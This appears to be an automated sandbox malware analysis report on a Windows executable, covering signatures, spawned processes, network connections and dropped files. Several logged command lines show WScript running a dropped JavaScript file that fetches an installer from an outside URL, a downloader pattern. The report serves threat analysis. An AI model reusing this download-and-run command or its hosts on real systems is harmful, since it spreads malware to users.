Analysis Overview
SHA256
2474e400d8766298dabd46b80780e17c2b5558a8fe42e7f9c5c448a1f7fbfacd
Threat Level: Likely malicious
The file 92427e540fdde6d74bab1aa8d61b5978_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Unsigned PE
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Modifies registry class
Suspicious use of WriteProcessMemory
Analysis: static1
Detonation Overview
Reported
2024-06-03 15:25
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 15:25
Reported
2024-06-03 15:28
Platform
win7-20240221-en
Max time kernel
117s
Max time network
118s
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\92427e540fdde6d74bab1aa8d61b5978_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\92427e540fdde6d74bab1aa8d61b5978_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1A25.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1A25.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1A25.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1A25.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1A25.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1A25.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1A25.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1A25.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1A25.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1A25.exe
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 3.18.7.81:80 | bi.downthat.com | tcp |
| US | 104.26.7.37:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf1A25.js
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\7WLXX66L.txt
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
C:\Users\Admin\AppData\Local\Temp\Cab62A9.tmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm
C:\Users\Admin\AppData\Local\Temp\Tar7AAD.tmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPR7YYBV\domain_profile[1].htm
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VIF0OH2A\domain_profile[1].htm
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 15:25
Reported
2024-06-03 15:28
Platform
win10v2004-20240508-en
Max time kernel
92s
Max time network
99s
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\92427e540fdde6d74bab1aa8d61b5978_JaffaCakes118.exe | N/A |
Command and Scripting Interpreter: JavaScript
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\92427e540fdde6d74bab1aa8d61b5978_JaffaCakes118.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\92427e540fdde6d74bab1aa8d61b5978_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\92427e540fdde6d74bab1aa8d61b5978_JaffaCakes118.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf399E.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf399E.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf399E.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf399E.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf399E.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf399E.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf399E.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf399E.exe
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf399E.js" http://www.djapp.info/?domain=oGOQqwBLFf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf399E.exe
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bi.downthat.com | udp |
| US | 52.86.6.113:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.hugedomains.com | udp |
| US | 8.8.8.8:53 | 113.6.86.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 52.86.6.113:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 52.86.6.113:80 | bi.downthat.com | tcp |
| US | 104.26.6.37:443 | www.hugedomains.com | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 52.86.6.113:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | www.djapp.info | udp |
| US | 52.86.6.113:80 | bi.downthat.com | tcp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| NL | 52.111.243.29:443 | | tcp |
| US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\fuf399E.js